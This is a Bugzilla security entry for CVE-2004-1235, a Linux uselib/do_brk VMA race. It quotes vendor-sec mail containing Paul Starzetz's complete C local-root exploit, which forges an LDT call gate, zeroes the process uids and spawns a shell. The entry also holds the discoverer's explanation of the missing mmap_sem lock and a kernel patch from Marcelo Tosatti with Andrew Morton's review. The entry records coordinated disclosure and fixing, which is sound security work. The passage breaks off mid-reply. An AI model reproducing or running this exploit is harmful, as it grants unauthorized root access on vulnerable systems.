Bugzilla – Bug 64492
VUL-0: CVE-2004-1235: ELF sys_uselib VMA race condition local root
Last modified: 2021-10-19 14:00:36 UTC
Date: Wed, 22 Dec 2004 16:40:14 +0100 (CET) From: Paul Starzetz <ihaquer@isec.pl> Reply-To: security@isec.pl To: vendor-sec <vendor-sec@lst.de> Subject: [vendor-sec] Merry Christmas -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi a special present for all members of vendorsec :-] This issue seems to be present also in 2.4.29-rc2. Merry Christmas. /* * binfmt_elf uselib VMA insert race vulnerability * v1.05 * * gcc -O2 -fomit-frame-pointer elflbl.c -o elflbl * * Copyright (c) 2004 iSEC Security Research. All Rights Reserved. * * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS" * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED. * */ #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <errno.h> #include <sched.h> #include <syscall.h> #include <limits.h> #include <sys/types.h> #include <sys/wait.h> #include <sys/time.h> #include <sys/mman.h> #include <sys/sysinfo.h> #include <linux/elf.h> #include <linux/linkage.h> #include <asm/page.h> #include <asm/ldt.h> #include <asm/segment.h> #define str(s) #s #define xstr(s) str(s) #define MREMAP_MAYMOVE 1 // temp lib location #define LIBNAME "/dev/shm/_elf_lib" // shell name #defineSHELL "/bin/bash" // time delta to detect race #define RACEDELTA 5000 // if you have more deadbebes in memory, change this #define MAGIC 0xdeadbabe // do not touch #defineSLAB_THRSH 128 #defineSLAB_PER_CHLD (INT_MAX - 1) #define LIB_SIZE ( PAGE_SIZE * 4 ) #define STACK_SIZE ( PAGE_SIZE * 4 ) #define LDT_PAGES ( (LDT_ENTRIES*LDT_ENTRY_SIZE+PAGE_SIZE-1)/PAGE_SIZE ) #define ENTRY_GATE ( LDT_ENTRIES-1 ) #define GATESEL( (ENTRY_GATE<<3)|0x07 ) #define kB * 1024 #define MB * 1024 kB #define GB * 1024 MB #define TMPLEN 256 #define PGD_SIZE ( PAGE_SIZE*1024 ) extern char **environ; static char cstack[STACK_SIZE]; static char name[TMPLEN]; static char line[TMPLEN]; static volatile 
int val = 0, go = 0, finish = 0, scnt = 0, old_esp = 0, delta = 0, map_flags = PROT_WRITE|PROT_READ; static int fstop=0, brute=0, ccnt=0, pidx, pnum=0, smp=4, cpid, uid, task_size, old_esp, lib_addr, map_count=0, map_base, map_addr, addr_min, addr_max, vma_start, vma_end, max_page; static struct timeval tm1, tm2; static char *myenv[] = {"TERM=vt100", "HISTFILE=/dev/null", NULL}; static char *pagemap; #define __NR_sys_gettimeofday __NR_gettimeofday #define __NR_sys_sched_yield __NR_sched_yield #define __NR_sys_madvise __NR_madvise #define __NR_sys_uselib__NR_uselib #define __NR_sys_mmap2 __NR_mmap2 #define __NR_sys_munmap__NR_munmap #define __NR_sys_mprotect __NR_mprotect #define __NR_sys_mremap__NR_mremap inline _syscall6(int, sys_mmap2, int, a, int, b, int, c, int, d, int, e, int, f); inline _syscall5(int, sys_mremap, int, a, int, b, int, c, int, d, int, e); inline _syscall3(int, sys_madvise, void*, a, int, b, int, c); inline _syscall3(int, sys_mprotect, int, a, int, b, int, c); inline _syscall3( int, modify_ldt, int, func, void *, ptr, int, bytecount ); inline _syscall2(int, sys_gettimeofday, void*, a, void*, b); inline _syscall2(int, sys_munmap, int, a, int, b); inline _syscall1(int, sys_uselib, char*, l); inline _syscall0(void, sys_sched_yield); inline int tmdiff(struct timeval *t1, struct timeval *t2) { int r; r=t2->tv_sec - t1->tv_sec; r*=1000000; r+=t2->tv_usec - t1->tv_usec; return r; } void fatal(const char *message, int critical) { int sig = critical? SIGSTOP : (fstop? 
SIGSTOP : SIGKILL); if(!errno) { fprintf(stdout, "\n[-] FAILED: %s ", message); } else { fprintf(stdout, "\n[-] FAILED: %s (%s) ", message, (char*) (strerror(errno)) ); } if(critical) printf("\nCRITICAL, entering endless loop"); printf("\n"); fflush(stdout); unlink(LIBNAME); kill(cpid, SIGKILL); for(;;) kill(0, sig); } tatic int raceme(void* v) { int r; printf("\n[+] exploit thread running pid=%d", getpid() ); fflush(stdout); finish=1; for(;;) { errno = 0; // check if raced: recheck: if(!go) sys_sched_yield(); sys_gettimeofday(&tm2, NULL); delta = tmdiff(&tm1, &tm2); if(delta < RACEDELTA) goto recheck; // check if lib VMAs exist as expected under race condition recheck2: r = sys_madvise((void*) lib_addr, PAGE_SIZE, MADV_NORMAL); if(r) continue; errno = 0; r = sys_madvise((void*) (lib_addr+PAGE_SIZE), LIB_SIZE-PAGE_SIZE, MADV_NORMAL); if(!r || (r<0 && errno != ENOMEM) ) continue; // SMP? if(smp-->=0) goto recheck2; // recheck race if(!go) continue; finish++; // we need to free one vm_area_struct for mmap to work r = sys_mprotect(map_addr, PAGE_SIZE, map_flags); if(r) fatal("mprotect", 0); r = sys_mmap2(lib_addr + PAGE_SIZE*2, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_ANONYMOUS|MAP_FIXED, 0, 0); if(-1 == r) fatal("mmap2 race", 0); printf("\n[+] race delta=%d maps=%d", delta, map_count); fflush(stdout); _exit(0); } return 0; } // get uid=0 kernel code (stolen from cliph) asmlinkage void kernel_code(unsigned *task) { unsigned *addr = task; // find & reset uids while(addr[0] != uid || addr[1] != uid || addr[2] != uid || addr[3] != uid) addr++; addr[0] = /*addr[1] = */addr[2] = addr[3] = 0; addr[4] = addr[5] = addr[6] = addr[7] = 0; // find & correct VMA for(addr=(unsigned *)task_size; (unsigned)addr<addr_min; addr++) { if(addr[0] >= task_size && addr[1] == vma_start && addr[2] == vma_end && addr[3] >= task_size ) { addr[1] = task_size - PAGE_SIZE; addr[2] = task_size; break; } } } void kcode(void); void __kcode(void) { asm( "kcode: \n" " pusha \n" " pushl %es \n" 
" pushl %ds \n" " movl $("xstr(__KERNEL_DS)") ,%edx \n" " movl %edx,%es\n" " movl %edx,%ds\n" " movl $0xffffe000,%eax\n" " andl %esp,%eax \n" " pushl %eax \n" " call kernel_code \n" " addl $4, %esp\n" " popl %ds \n" " popl %es \n" " popa \n" " lret \n" ); } void static sigfailed(int v) { ccnt++; fatal("lcall", 1); } // modify LDT & exec void try_to_exploit(unsigned addr) { volatile int r, *v; printf("\n[!] try to exploit 0x%.8x", addr); fflush(stdout); r = sys_mprotect(addr, PAGE_SIZE, PROT_READ|PROT_WRITE|PROT_EXEC); if(r) fatal("mprotect 1", 1); // check if really LDT v = (void*) (addr + (ENTRY_GATE*LDT_ENTRY_SIZE % PAGE_SIZE) ); signal(SIGSEGV, sigfailed); r = *v; if(r != MAGIC) { printf("\n[-] FAILED val = 0x%.8x", r); fflush(stdout); fatal("find LDT", 1); } // yeah! *v = ((unsigned)__KERNEL_CS << 16) | ((unsigned)kcode & 0xffffU); *(v+1) = ((unsigned)kcode & ~0xffffU) | 0xec00U; printf("\n[+] SUCCESS (LDT found v=0x%.8x)", *v); fflush(stdout); // reprotect to get one VMA r = sys_mprotect(addr, PAGE_SIZE, PROT_READ|PROT_EXEC); if(r) fatal("mprotect 2", 1); // CPL0 transition asm("lcall $" xstr(GATESEL) ",$0x0"); if( getuid()==0 ) { printf("\n[+] exploited, uid=0\n" ); fflush(stdout); } else { printf("\n[-] uid change failed" ); fflush(stdout); sigfailed(0); } signal(SIGTERM, SIG_IGN); kill(0, SIGTERM); execl(SHELL, "sh", NULL); fatal("execl", 0); } void static scan_mm_finish(); void static scan_mm_start(); // kernel page table scan code void static scan_mm() { map_addr -= PAGE_SIZE; if(map_addr <= addr_min) scan_mm_start(); scnt=0; val = *(int*)map_addr; scan_mm_finish(); } void static scan_mm_finish() { retry: __asm__("movl %0, %%esp" : :"m"(old_esp) ); if(scnt) { pagemap[pidx] ^= 1; } else { sys_madvise((void*)map_addr, PAGE_SIZE, MADV_DONTNEED); } pidx--; scan_mm(); goto retry; } // make kernel page maps before and after allocating LDT void static scan_mm_start() { static int npg=0; static struct modify_ldt_ldt_s l; static struct sysinfo si; pnum++; 
if(pnum==1) { sysinfo(&si); addr_min = task_size + si.totalram; addr_min = (addr_min + PGD_SIZE - 1) & ~(PGD_SIZE-1); addr_max = addr_min + si.totalram; if(addr_max >= 0xffffe000 || addr_max < addr_min) addr_max = 0xffffd000; printf("\n[+] vmalloc area 0x%.8x - 0x%.8x", addr_min, addr_max); max_page = (addr_max - addr_min) / PAGE_SIZE; pagemap = malloc( max_page + 32 ); if(!pagemap) fatal("malloc pagemap", 1); memset(pagemap, 0, max_page + 32); pidx = max_page-1; } else if(pnum==2) { memset(&l, 0, sizeof(l)); l.entry_number = LDT_ENTRIES-1; l.seg_32bit = 1; l.base_addr = MAGIC >> 16; l.limit = MAGIC & 0xffff; l.limit_in_pages = 1; if( modify_ldt(1, &l, sizeof(l)) != 0 ) fatal("modify_ldt", 1); pidx = max_page-1; } else if(pnum==3) { npg=0; for(pidx=0; pidx<=max_page-1; pidx++) { if(pagemap[pidx]) { npg++; fflush(stdout); } else if(npg == LDT_PAGES) { npg=0; try_to_exploit(addr_min + (pidx-1)*PAGE_SIZE); } else { npg=0; } } fatal("find LDT", 1); } // save context & scan page table __asm__("movl %%esp, %0" : :"m"(old_esp) ); map_addr = addr_max; scan_mm(); } // return number of available SLAB objects in cache static int get_slab_objs(const char *sn) { static int c, d, u = 0, a = 0; FILE *fp=NULL; fp = fopen("/proc/slabinfo", "r"); if(!fp) fatal("get_slab_objs: fopen", 0); fgets(name, sizeof(name) - 1, fp); do { c = u = a = -1; if (!fgets(line, sizeof(line) - 1, fp)) break; c = sscanf(line, "%s %u %u %u %u %u %u", name, &u, &a, &d, &d, &d, &d); } while (strcmp(name, sn)); close(fileno(fp)); fclose(fp); return c == 7 ? 
a - u : -1; } // leave one object in the SLAB inline void prepare_slab() { int *r; map_addr -= PAGE_SIZE; map_count++; map_flags ^= PROT_READ; r = (void*)sys_mmap2((unsigned)map_addr, PAGE_SIZE, map_flags, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0 ); if(MAP_FAILED == r) { fatal("try again", 0); } *r = map_addr; } // sig handlers void static segvcnt(int v) { scnt++; scan_mm_finish(); } void static reaper(int v) { ccnt++; waitpid(0, &v, WNOHANG|WUNTRACED); } // use elf library and try to sleep on kmalloc void exploitme() { int r, sz; printf("\n cat /proc/%d/maps", getpid() ); fflush(stdout); signal(SIGCHLD, reaper); signal(SIGSEGV, segvcnt); signal(SIGBUS, segvcnt); // helper clone finish=0; ccnt=0; sz = sizeof(cstack) / sizeof(cstack[0]); cpid = clone(&raceme, (void*) &cstack[sz-16], CLONE_VM|CLONE_SIGHAND|CLONE_FS|SIGCHLD, NULL ); if(-1==cpid) fatal("clone", 0); // synchronize threads while(!finish) sys_sched_yield(); finish=0; // try to hit the kmalloc race for(;;) { r = get_slab_objs("vm_area_struct"); while(r != 1) { prepare_slab(); r--; } sys_gettimeofday(&tm1, NULL); go = 1; r=sys_uselib(LIBNAME); go = 0; if(r) fatal("uselib", 0); if(finish) break; // wipe lib VMAs and try again r = sys_munmap(lib_addr, LIB_SIZE); if(-1==r || ccnt) goto failed; } // seems we raced r = sys_munmap(map_addr, map_base-map_addr + PAGE_SIZE); if(r) fatal("munmap 1", 0); r = sys_munmap(lib_addr, PAGE_SIZE); if(r) fatal("munmap 2", 0); // write protect brk VMA to fool vm_enough_memory() r = sys_mprotect((lib_addr + PAGE_SIZE), LIB_SIZE-PAGE_SIZE, PROT_READ|PROT_EXEC); if(-1==r) fatal("mprotect brk", 0); // this will finally make the big VMA... 
sz = (0-lib_addr) - LIB_SIZE - PAGE_SIZE; expand: r = sys_madvise((void*)(lib_addr + PAGE_SIZE), LIB_SIZE-PAGE_SIZE, MADV_NORMAL); if(r) fatal("madvise", 0); r = sys_mremap(lib_addr + LIB_SIZE-PAGE_SIZE, PAGE_SIZE, sz, MREMAP_MAYMOVE, 0); if(-1==r) { if(0==sz) fatal("mremap: expand VMA", 0); else { sz -= PAGE_SIZE; goto expand; } } vma_start = lib_addr + PAGE_SIZE; vma_end = vma_start + sz + 2*PAGE_SIZE; // try to figure kernel layout printf("\n expanded VMA (0x%.8x-0x%.8x)", vma_start, vma_end); fflush(stdout); scan_mm_start(); failed: fatal("try again", 0); } // make fake ELF library static void make_lib() { struct elfhdr eh; struct elf_phdr eph; static char tmpbuf[PAGE_SIZE]; int fd; // make our elf library umask(022); unlink(LIBNAME); fd=open(LIBNAME, O_RDWR|O_CREAT|O_TRUNC, 0755); if(fd<0) fatal("open lib", 0); memset(&eh, 0, sizeof(eh) ); // elf exec header memcpy(eh.e_ident, ELFMAG, SELFMAG); eh.e_type = ET_EXEC; eh.e_machine = EM_386; eh.e_phentsize = sizeof(struct elf_phdr); eh.e_phnum = 1; eh.e_phoff = sizeof(eh); write(fd, &eh, sizeof(eh) ); // section header: memset(&eph, 0, sizeof(eph) ); eph.p_type = PT_LOAD; eph.p_offset = 4096; eph.p_filesz = 4096; eph.p_vaddr = lib_addr; eph.p_memsz = LIB_SIZE; eph.p_flags = PF_W|PF_R|PF_X; write(fd, &eph, sizeof(eph) ); // execable code lseek(fd, 4096, SEEK_SET); memset(tmpbuf, 0x90, sizeof(tmpbuf) ); write(fd, &tmpbuf, sizeof(tmpbuf) ); close(fd); } // move stack down #2 void prepare_finish() { int r; old_esp &= ~(PAGE_SIZE-1); old_esp -= PAGE_SIZE; task_size = ((unsigned)old_esp + 1 GB ) / (1 GB) * 1 GB; r = sys_munmap(old_esp, task_size-old_esp); if(r) fatal("unmap stack", 0); // setup rt env uid = getuid(); lib_addr = task_size - LIB_SIZE - PAGE_SIZE; map_base = map_addr = (lib_addr - PGD_SIZE) & ~(PGD_SIZE-1); printf("\n[+] moved stack %x, task_size=%x, map_base=%x", old_esp, task_size, map_base); fflush(stdout); make_lib(); exploitme(); } // move stack down #1 void prepare() { unsigned p=0; environ = myenv; 
p = sys_mmap2( 0, STACK_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0 ); if(-1==p) fatal("mmap2 stack", 0); p += STACK_SIZE - 64; __asm__("movl %%esp, %0 \n" "movl %1, %%esp \n" : : "m"(old_esp), "m"(p) ); prepare_finish(); } void static chldcnt(int v) { ccnt++; } // alloc slab objects... inline void do_wipe() { int *r, c=0, left=0; __asm__("movl %%esp, %0" : : "m"(old_esp) ); old_esp = (old_esp - PGD_SIZE) & ~(PGD_SIZE-1); for(;;) { if(left<=0) left = get_slab_objs("vm_area_struct"); if(left <= SLAB_THRSH) break; left--; map_flags ^= PROT_READ; old_esp -= PAGE_SIZE; r = (void*)sys_mmap2(old_esp, PAGE_SIZE, map_flags, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0 ); if(MAP_FAILED == r) break; c++; if(c>SLAB_PER_CHLD) break; if( (c%1024)==0 ) { printf("\rchild %d %d", val, c); fflush(stdout); } } kill(getppid(), SIGUSR1); for(;;) pause(); } void wipe_slab() { signal(SIGUSR1, chldcnt); for(;;) { ccnt=0; val++; cpid = fork(); if(!cpid) { printf("\n"); do_wipe(); } pause(); if( get_slab_objs("vm_area_struct") <= SLAB_THRSH ) break; sys_sched_yield(); } printf("\n"); signal(SIGUSR1, SIG_DFL); } void usage(char *n) { printf("\nUsage: %s\t-s forced stop\n", n); printf("\t\t-n SMP iterations\n"); printf("\t\t-b empty SLAB mode\n"); printf("\n"); _exit(1); } // give -s for forced stop, -b to clean SLAB int main(int ac, char **av) { int r; while(ac) { r = getopt(ac, av, "bsn:"); if(r<0) break; switch(r) { case 's' : fstop = 1; break; case 'n' : smp = atoi(optarg); if(smp<0) fatal("bad value", 0); break; case 'b' : brute = 1; break; default: usage(av[0]); break; } } uid = getuid(); setpgrp(); if(brute) wipe_slab(); prepare(); return 0; } - -- Paul Starzetz iSEC Security Research http://isec.pl/
<!-- SBZ_reproduce --> There was no correct description, only this exploit.
Maybe Andrea can also have a look at how this could be fixed. Btw, did you try the exploit on one of our kernels?
No, I didn't; it just arrived. There have been reports that it doesn't work with gcc 3.x compilers and that it crashes some kernels.
Date: Wed, 22 Dec 2004 21:28:43 +0100 (CET) From: Paul Starzetz <ihaquer@isec.pl> To: Solar Designer <solar@openwall.com> Cc: security@isec.pl, vendor-sec <vendor-sec@lst.de> Subject: Re: [vendor-sec] Merry Christmas On Wed, 22 Dec 2004, Solar Designer wrote: > -ow patched kernels with CONFIG_BINFMT_ELF_AOUT not set (default) are > not vulnerable, correct? :-) it seems that also a.out's uselib and maybe others are vuln. -- Paul Starzetz iSEC Security Research http://isec.pl/
Date: Wed, 22 Dec 2004 21:54:09 +0100 (CET) From: Paul Starzetz <ihaquer@isec.pl> To: Solar Designer <solar@openwall.com> Cc: security@isec.pl, vendor-sec <vendor-sec@lst.de> Subject: Re: [vendor-sec] Merry Christmas On Wed, 22 Dec 2004, Solar Designer wrote: > Is there such a thing? I only see one sys_uselib() in exec.c, and > it's not compiled in with our patches by default. It's obsolete. I'm talking about: static int load_aout_library(struct file *file) { struct inode * inode; unsigned long bss, start_addr, len; unsigned long error; int retval; struct exec ex; inode = file->f_dentry->d_inode; retval = -ENOEXEC; error = kernel_read(file, 0, (char *) &ex, sizeof(ex)); . . . -- Paul Starzetz iSEC Security Research http://isec.pl/
It did nothing on an SL 9.1, but this doesn't have to mean much. Due to the missing explanation I don't know where the bug is yet.
Well, we have quite some additions and improvements in the VM of our kernels, so chances are we could be immune against the problem because it might be already fixed by Andrea's changes. This is why I would like him to take a look. He probably even understands what the exploit is actually doing ;)
You have the original email, so could you attach a working .c file to bugzilla or forward me the original email? Cutting and pasting isn't working at all with Konqueror.
I presume the exploited vma insertion is the one in load_elf_library: /* Now use mmap to map the library into memory. */ down_write(&current->mm->mmap_sem); error = do_mmap(file, ELF_PAGESTART(elf_phdata->p_vaddr), (elf_phdata->p_filesz + ELF_PAGEOFFSET(elf_phdata->p_vaddr)), PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_PRIVATE | MAP_DENYWRITE, (elf_phdata->p_offset - ELF_PAGEOFFSET(elf_phdata->p_vaddr))); up_write(&current->mm->mmap_sem); The above call is like an mmap; the kernel should be doing all the necessary checks internally to do_mmap. Perhaps the bug is that do_mmap isn't doing all necessary checks? I don't get why he's only posting a non-working exploit, instead of commenting on where the bug is. He must know where the real bug is, or he wouldn't have been able to write a working exploit. I read the function one time and I don't see race conditions yet (reading the exploit it seems this is a race condition with threads involving sys_uselib and the code path of sys_uselib is straightforward until it calls load_elf_library). Even the kmalloc sleep shouldn't make a difference (even though he mentions a kmalloc sleep in his exploit). Our fs/binfmt_elf.c file is the same as 2.6.10-rc3 in this function so if it happens with 2.6.10-rc3 it should happen with our tree too if the problem is really the one he's talking about. CONFIG_BINFMT_ELF_AOUT doesn't exist in mainline and in our kernel, so Solar's comment isn't clear to me. It would be nice to have the confirmation that this is reproducible and that he's not running a buggy kernel hacked by him while testing his program. Did you try with 2.4.29-rc2? Perhaps this is only a 2.4 bug (I only read 2.6 so far).
* This comment was added by mail. Date: Thu, 30 Dec 2004 15:48:35 +0100 (CET) From: Paul Starzetz <ihaquer@isec.pl> To: Marcelo Tosatti <marcelo.tosatti@cyclades.com> Cc: Josh Bressers <bressers@redhat.com>, security@isec.pl, vendor-sec <vendor-sec@lst.de>, Solar Designer <solar@openwall.com> Subject: Re: [vendor-sec] Merry Christmas On Wed, 29 Dec 2004, Marcelo Tosatti wrote: | Hi Paul, | | Can you describe whats going on at the kernel level? | | I really dont have the time to read and understand the exploit. Will take | some time to try it tomorrow. OK no prob, it was just too obvious for me. | | The problem is in the sys_uselib() system call to select shared library, | but what is the race scenario ? There is a missing down() on the current->mm->mmap_sem semaphore while calling do_brk(). As you see (for 2.4 as well for 2.6) there is a down/up_write pair before around do_mmap, but none around do_brk. And looking into the code of sys_brk it is clear that do_brk is called with the semaphore held. In other words: if do_brk() sleeps on kmalloc for the vm_area_struct it may insert the VMA in old place while the VMA list/tree has been modified by another thread. That is used by the exploit to create two overlapping VMAs like: [A.......B] VMA N [C...D] VMA N+1 then it exploits the features of mremap() that calculates the maximum possible address for extending a VMA by taking the next VMA and building the difference between the requested address and next's vm_start... but if this is less than the vm_end of the previous VMA this will result in a big integer, something like (unsigned)-1 & ~4093 etc... The remaining work is analogous to the do_brk exploit. Note that this is not a bug in mremap. I have found at least three different ways to exploit once we have overlapping VMAs... Attached latest version, never tested on gcc 3.x (however statically linked 2.95 version works on a gcc 3.x compiled kernel). May need to be run few times with -s -b switches.
Created attachment 27352 [details] elflbl_v106.c
* This comment was added by mail. Date: Fri, 31 Dec 2004 14:15:34 -0200 From: Marcelo Tosatti <marcelo.tosatti@cyclades.com> To: Paul Starzetz <ihaquer@isec.pl> Cc: Josh Bressers <bressers@redhat.com>, security@isec.pl, vendor-sec <vendor-sec@lst.de>, Solar Designer <solar@openwall.com>, Andrew Morton <akpm@osdl.org>, Chris Wright <chrisw@osdl.org> Subject: Re: [vendor-sec] Merry Christmas User-Agent: Mutt/1.5.5.1i X-Spam-Level: On Thu, Dec 30, 2004 at 03:48:35PM +0100, Paul Starzetz wrote: | On Wed, 29 Dec 2004, Marcelo Tosatti wrote: | | > Hi Paul, | > | > Can you describe whats going on at the kernel level? | > | > I really dont have the time to read and understand the exploit. Will take | > some time to try it tomorrow. | | OK no prob, it was just too obvious for me. Well wasnt for me :) | > The problem is in the sys_uselib() system call to select shared library, | > but what is the race scenario ? | | There is a missing down() on the current->mm->mmap_sem semaphore while | calling do_brk(). As you see (for 2.4 as well for 2.6) there is a | down/up_write pair before around do_mmap, but none around do_brk. And | looking into the code of sys_brk it is clear that do_brk is called with | the semaphore held. | | In other words: if do_brk() sleeps on kmalloc for the vm_area_struct it | may insert the VMA in old place while the VMA list/tree has been modified | by another thread. That is used by the exploit to create two overlapping | VMAs like: | | [A.......B] VMA N | [C...D] VMA N+1 | | then it exploits the features of mremap() that calculates the maximum | possible address for extending a VMA by taking the next VMA and building | the difference between the requested address and next's vm_start... but if | this is less than the vm_end of the previous VMA this will result in a big | integer, something like (unsigned)-1 & ~4093 etc... The remaining work is | analogous to the do_brk exploit. | | Note that this is not a bug in mremap. 
I have found at least three | different ways to exploit once we have overlapping VMAs... | | Attached latest version, never tested on gcc 3.x (however statically | linked 2.95 version works on a gcc 3.x compiled kernel). May need to be | run few times with -s -b switches. OK I see, thanks for the explanation. Here is a fix against 2.4.29-pre3 to create new do_brk() to grab the mmap_sem and call __do_brk (old do_brk()). This is much simpler than fixing each caller of do_brk - there are many in the binary format loaders (ELF and aout). Andrew, if you're OK with the addition of lockless __do_brk() and locking do_brk() as the following patch I can prepare a v2.6 patch. With this in place I can't crash my testbox anymore (it used to crash with Paul's exploit) - your exploit now eats all memory+swap and triggers OOM killer. diff -Nur linux-2.4.28.orig/arch/ia64/kernel/sys_ia64.c linux-2.4.28/arch/ia64/kernel/sys_ia64.c --- linux-2.4.28.orig/arch/ia64/kernel/sys_ia64.c 2004-12-31 15:21:15.117588248 -0200 +++ linux-2.4.28/arch/ia64/kernel/sys_ia64.c 2004-12-31 15:29:43.833251712 -0200 goto out; /* Ok, looks good - let it rip. */ - if (do_brk(oldbrk, newbrk-oldbrk) != oldbrk) + if (__do_brk(oldbrk, newbrk-oldbrk) != oldbrk) goto out; set_brk: mm->brk = brk; diff -Nur linux-2.4.28.orig/arch/mips/kernel/sysirix.c linux-2.4.28/arch/mips/kernel/sysirix.c --- linux-2.4.28.orig/arch/mips/kernel/sysirix.c 2004-12-31 15:21:15.292561648 -0200 +++ linux-2.4.28/arch/mips/kernel/sysirix.c 2004-12-31 15:30:03.311290600 -0200 * Ok, looks good - let it rip. */ mm->brk = brk; - do_brk(oldbrk, newbrk-oldbrk); + __do_brk(oldbrk, newbrk-oldbrk); ret = 0; out: diff -Nur linux-2.4.28.orig/arch/sparc/kernel/sys_sunos.c linux-2.4.28/arch/sparc/kernel/sys_sunos.c --- linux-2.4.28.orig/arch/sparc/kernel/sys_sunos.c 2004-12-31 15:21:15.389546904 -0200 +++ linux-2.4.28/arch/sparc/kernel/sys_sunos.c 2004-12-31 15:30:44.029100552 -0200 * Ok, we have probably got enough memory - let it rip. 
*/ current->mm->brk = brk; - do_brk(oldbrk, newbrk-oldbrk); + __do_brk(oldbrk, newbrk-oldbrk); retval = 0; out: up_write(&current->mm->mmap_sem); diff -Nur linux-2.4.28.orig/arch/sparc64/kernel/sys_sunos32.c linux-2.4.28/arch/sparc64/kernel/sys_sunos32.c --- linux-2.4.28.orig/arch/sparc64/kernel/sys_sunos32.c 2004-12-31 15:21:15.571519240 -0200 +++ linux-2.4.28/arch/sparc64/kernel/sys_sunos32.c 2004-12-31 15:31:24.532943032 -0200 goto out; /* Ok, we have probably got enough memory - let it rip. */ current->mm->brk = brk; - do_brk(oldbrk, newbrk-oldbrk); + __do_brk(oldbrk, newbrk-oldbrk); retval = 0; out: up_write(&current->mm->mmap_sem); diff -Nur linux-2.4.28.orig/include/linux/mm.h linux-2.4.28/include/linux/mm.h --- linux-2.4.28.orig/include/linux/mm.h 2004-12-31 15:21:17.710194112 -0200 +++ linux-2.4.28/include/linux/mm.h 2004-12-31 15:25:20.494285320 -0200 extern int do_munmap(struct mm_struct *, unsigned long, size_t); +extern unsigned long __do_brk(unsigned long, unsigned long); extern unsigned long do_brk(unsigned long, unsigned long); static inline void __vma_unlink(struct mm_struct * mm, struct vm_area_struct * vma, struct vm_area_struct * prev) diff -Nur linux-2.4.28.orig/kernel/ksyms.c linux-2.4.28/kernel/ksyms.c --- linux-2.4.28.orig/kernel/ksyms.c 2004-12-31 15:21:15.782487168 -0200 +++ linux-2.4.28/kernel/ksyms.c 2004-12-31 15:32:30.574903128 -0200 /* process memory management */ EXPORT_SYMBOL(do_mmap_pgoff); EXPORT_SYMBOL(do_munmap); +EXPORT_SYMBOL(__do_brk); EXPORT_SYMBOL(do_brk); EXPORT_SYMBOL(exit_mm); EXPORT_SYMBOL(exit_files); diff -Nur linux-2.4.28.orig/mm/mmap.c linux-2.4.28/mm/mmap.c --- linux-2.4.28.orig/mm/mmap.c 2004-12-31 15:21:14.880624272 -0200 +++ linux-2.4.28/mm/mmap.c 2004-12-31 15:26:41.029042176 -0200 goto out; /* Ok, looks good - let it rip. */ - if (do_brk(oldbrk, newbrk-oldbrk) != oldbrk) + if (__do_brk(oldbrk, newbrk-oldbrk) != oldbrk) goto out; set_brk: mm->brk = brk; return ret; } + /* * this is really a simplified "do_mmap". 
it only handles * anonymous maps. eventually we may be able to do some * brk-specific accounting here. */ -unsigned long do_brk(unsigned long addr, unsigned long len) +unsigned long __do_brk(unsigned long addr, unsigned long len) { struct mm_struct * mm = current->mm; struct vm_area_struct * vma, * prev; return addr; } +/* locking version of __do_brk. */ +unsigned long do_brk(unsigned long addr, unsigned long len) +{ + unsigned long ret; + + down_write(&current->mm->mmap_sem); + ret = __do_brk(addr, len); + up_write(&current->mm->mmap_sem); + + return ret; +} + /* Build the RB tree corresponding to the VMA list. */ void build_mmap_rb(struct mm_struct * mm) { _______________________________________________ Vendor Security mailing list Vendor Security@lst.de https://www.lst.de/cgi-bin/mailman/listinfo/vendor-sec Date: Fri, 31 Dec 2004 20:57:06 +0100 (CET) From: Paul Starzetz <ihaquer@isec.pl> To: Marcelo Tosatti <marcelo.tosatti@cyclades.com> Cc: Josh Bressers <bressers@redhat.com>, vendor-sec <vendor-sec@lst.de>, Solar Designer <solar@openwall.com>, Andrew Morton <akpm@osdl.org>, Chris Wright <chrisw@osdl.org> Subject: Re: [vendor-sec] Merry Christmas X-Spam-Level: On Fri, 31 Dec 2004, Marcelo Tosatti wrote: | With this in place I can't crash my testbox anymore (it used to crash with Paul's | exploit) - your exploit now eats all memory+swap and triggers OOM killer. Well... 
actually it should give sh-2.05# you may try the binary from http://isec.pl/paul/love_krove.gif (no trojan ;-) -- Paul Starzetz iSEC Security Research http://isec.pl/ _______________________________________________ Vendor Security mailing list Vendor Security@lst.de https://www.lst.de/cgi-bin/mailman/listinfo/vendor-sec Date: Fri, 31 Dec 2004 14:36:27 -0800 From: Andrew Morton <akpm@osdl.org> To: Marcelo Tosatti <marcelo.tosatti@cyclades.com> Cc: ihaquer@isec.pl, bressers@redhat.com, security@isec.pl, vendor-sec@lst.de, solar@openwall.com, chrisw@osdl.org Subject: Re: [vendor-sec] Merry Christmas X-Mailer: Sylpheed version 0.9.7 (GTK+ 1.2.10; i386-redhat-linux-gnu) X-Spam-Level: Marcelo Tosatti <marcelo.tosatti@cyclades.com> wrote: | | Andrew, if you're OK with the addition of lockless __do_brk() and locking do_brk() | as the following patch I can prepare a v2.6 patch. OK... I'm a bit concerned that do_brk() is, for some reason, exported to modules. If someone is already taking mmap_sem prior to calling do_brk(), we've just gone and made them deadlock. So I think it would be better to leave do_brk unchanged and to introduce a new do_brk_unlocked() which takes mmap_sem then calls do_brk. _______________________________________________ Vendor Security mailing list Vendor Security@lst.de https://www.lst.de/cgi-bin/mailman/listinfo/vendor-sec Date: Sat, 1 Jan 2005 11:05:21 -0200 From: Marcelo Tosatti <marcelo.tosatti@cyclades.com> To: Andrew Morton <akpm@osdl.org> Cc: ihaquer@isec.pl, bressers@redhat.com, security@isec.pl, vendor-sec@lst.de, solar@openwall.com, chrisw@osdl.org Subject: Re: [vendor-sec] Merry Christmas User-Agent: Mutt/1.5.5.1i X-Spam-Level: On Fri, Dec 31, 2004 at 02:36:27PM -0800, Andrew Morton wrote: | Marcelo Tosatti <marcelo.tosatti@cyclades.com> wrote: | > | > Andrew, if you're OK with 